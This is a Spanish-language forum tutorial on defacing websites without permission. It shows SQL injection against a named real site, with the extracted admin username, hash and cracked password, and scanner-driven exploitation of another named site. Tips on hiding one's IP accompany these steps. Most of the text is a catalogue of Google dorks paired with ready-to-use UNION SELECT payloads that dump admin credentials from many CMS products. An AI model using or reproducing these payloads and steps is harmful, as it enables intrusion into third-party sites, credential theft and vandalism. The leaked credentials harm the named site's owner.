Tutorial:Defacear Web

Bueno,he visto tutoriales k postean acerca de como defacear una web,pero les pido a las personas k lo hacen, k si van a postear algo k lo expliken y no solo sea copy/paste de alguna otra web.

IMPORTANTE:Este Tutorial es con el Fin de k Aprendan!!

"Un Hacker no Nace Sabiéndo, Si no Aprendiendó"
--------------------
Que es un Deface? es una modificación de un portal o web sin autorización del administrador, casi siempre va dirigido al index de la web para que sea mas llamativo.

Ahora les Explikare como Defacear atravez de Inyeccion SQL y SSS.

IMPORTANTE:Antes de hacer un Deface!! Debes Ocultar tu ip, para star anonimos y no dejar huellas!!

Para eso usaremos el Hide-ip.

--------------------

*Inyeccion SQL

Es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación.

Una Vez k ya sabemos en k consiste,procedamos a ponerlo en Practica:

1.-Para Realizar ste Deface,Contaremos con el "Google" ya k nos facilitara mucho el trabajo.

2.-Una vez Ingresado al "Google",buskaremos el tipo de web k vamos a Defacear.
Ejemplo:

Cita:

modules.php?name=Statistics Version PHP-Nuke

Lo k hara,sera buscar todo tipo de webs con esa descripcion:

Has click en la barra para ver el tamaño original.

LA web k Elegi:

Cita:

http://granjamahiryia.org/

3.-Ahora,una vez localizada la web k vayamos a Defacear,meteremos la Inyeccion SQL.

La Inyeccion para ste tipo de web,seria sta:

Cita:

modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Para hacer la Inyeccion,solo kitaremos lo k sige despues de "Modules".

Ejemplo:

Web sin Inyeccion: http://granjamahiryia.org//modules.php?name=Statistics
Web con Inyeccion: http://granjamahiryia.org//Inyeccion SQL

Has click en la barra para ver el tamaño original.

Una vez k hallamos hecho la Inyeccion SQL, podremos sakar la clave y login del Administrador.

ID:gamemohamed
clave:6896c3fd7eb4ca88240e2c5ba8a2f334

ADVERTENCIA:La clave sta Encriptada.

4.-Ya tenemos el nick y clave "encriptada"...ahora pasaremos a Desencriptarla,para eso tenemos muchos cracks de MD5:
http://gdataonline.com/seekhash.php

Has click en la barra para ver el tamaño original.

Listo, ya los tenemos:

Cita:

ID:gamemohamed
clave:giovanna1

5.-Ahora,nos logearemos como si fueramos los Admin. xD:

Listo,Ya tienes acceso a toda la web,ya puedes modificarla,eliminarla,etc...

6.-Asi keda mi Deface:

----------------------------

*Shadow Securty Scanner (SSS)

Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.

1.-Descargar e Instalar el SSS.

2.-Buscar una web Victima, en ste caso:

Cita:

www.mexicool.com.mx

3.-Abrir el SSS y dar en la opcion "Scanner" y luego marcar la opcion de "Complet Scan" debido a k haremos un scaneo de toda la web en busca de alguna Vulnabilidad:

Has click en la barra para ver el tamaño original.

4.-Una vez hecho sto,saldra una ventana k dice "ADD" es donde agregaremos el link de la web k scanearemos:

OJO:Al momento de poner el Link, no se pone el http y www

5.-Ya tenemos la web agregada,ahora solo click en "Start Scan"

Has click en la barra para ver el tamaño original.

El proceso de Scaneo tarda entre 30 min o 1 hora.

6.-Una vez k se Termine de Scanear, podras observar donde dice "Vulnerabilities" k son las Vulnabilidades k contiene la web.

Verde: poka vulnabilidad
azul: media vulnabilidad
rojo: alta vulnabilidad

Has click en la barra para ver el tamaño original.

7.-Como explotamos sta vulnabilidad? Solo basta con darle click al k usaremos y observar sus propiedades k salen, una de ellas "Bugtraq ID" y asu lado un numero:

Has click en la barra para ver el tamaño original.

8.-Le damos click al numero k sale y nos enviara a la Pagina de SecurityFocus k es una pagina donde encontraremos los exploits k usaremos,Damos click en "EXploits" y nos saldra los k sten disponibles:

9.-Listo, ya lo tenemos!! solo keda Descargarlo y compilarlo segun sea el exploit, en ste caso es "c"...por lo tanto lo compilamos con el cmd y utilizando antes del cygwin.

10.-Asi keda mi Deface:

Hide IP: http://rapidshare.com/files/139139960/Hide-Ip.rar.html
Inyecciones SQL:

Buscar en google: modules.php?name=Statistics Version PHP-Nuke

Inyeccion: modules.php?name=Search&type=comments&%20%20%20que ry=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

-------------

Buscar en google: allintext: "This site is powered by IndexScript"

Inyeccion: show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

-------------
DORK 1 : powered by Site Sift

DORK 2 : allinurl: "index php go addpage"

DORK 2 : allinurl: "index.php?go=detail id="

EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*

EXPLOIT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*

ADMiN LOGiN::admin/login.php

---------

724CMS + "Version 4.01"

index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,1 0,11,concat_ws(0x202d20,ID,User_Login,User_Passwor d),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 +FROM+Users--

-----------------------------------------------------------------------------------------------------------

allinurl: "index.php?p=gallerypic img_id"
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user

EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user

-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "index.php?mod=archives"

EXPLOiT 1:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*

-----------------------------------------------------------------------------------------------------------

DORK 1 : "Powered by Smoothflash"

DORK 2 : allinurl: "admin_view_image.php"

EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

DORK 1 : allinurl: \"sections.php?op=listarticles\"secid

DORK 2 ; allinurl: \"sections php op\"

EXPLOiT :

sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd)/**/from/**/authors/*

sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd),1,2,concat(aid,0x3a,pwd)/**/from/**/authors/*

sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd),2/**/from/**/authors/*

sections.php?op=printpage&artid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd)/**/from/**/authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : \"Powered by Esy\"

EXPLOiT 1 :

sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*

EXPLOiT 2 :

sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"fundlinkllc.com\"

DORK 2 : \"Fundlink LLC\"

EXPLOiT :

showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
-------------------------------------------------------------

DORK 1 : allinurl: \"index.php?go=detail\"

DORK 2 : allinurl: \"Powered by Com Endeavors\"

DORK 3 : \"Emlak NET Kiralik ve Satilik Emlak Sitesi\"

*****DORKS******

allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"

EXPLOIT :

index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(usernam e,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*where,limit,2--

admin panel login:

admin/login.php hay muchas
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"index.php?pgid\"cat_id

EXPLOIT :

index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x 3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "showCat.php?cat_id"

EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "modules/photo/viewcat.php?id"

DORK 2 : inurl:photo "powered by runcms"

EXPLOIT :

admin

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
-----------------------------------------------------------------------------------
DORK 1 : allinurl: "modules MyAnnonces index php pa view"

EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

-----------------------------------------------------------------------------------

DorKs 1 : "2007 BookmarkX script"

DORKS 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

o

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1

-----------------------------------------------------------------------------------

DORKS 2 : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(5,login,password),444+from+admin _login/*

-----------------------------------------------------------------------------------

DORK 1 : allinurl: \"recipe.php?recipeid\"

admin login=siteadmin

EXPLOIT :

recipe.php?recipeid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*

-----------------------------------------------------------------------------------
DORK 1 : "powered by niccell"

##admin login=siteadmin

EXPLOIT :

list.php?pagenum=S@BUN&categoryid=9999+union+selec t+111,222,concat(login,0x3a,password),444+from+adm in_login/*

----------------------------------------------------------------------------------

DORK 1 : allinurl:\"print.php?recipeid\"

admin login=siteadmin

EXPLOIT :

print.php?recipeid=777%2F%2A%2A%2Funion%2F%2A%2A%2 Fselect/**/0,concat(login,0x3a,password)/**/from%2F%2A%2A%2Fadmin_login/*where%20admin
-----------------------------------------------------------------------------------------------------------

DORK 1 : allinurl:"list.php?pagenum"catid

admin login=siteadmin

EXPLOIT :

list.php?pagenum=0&catid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*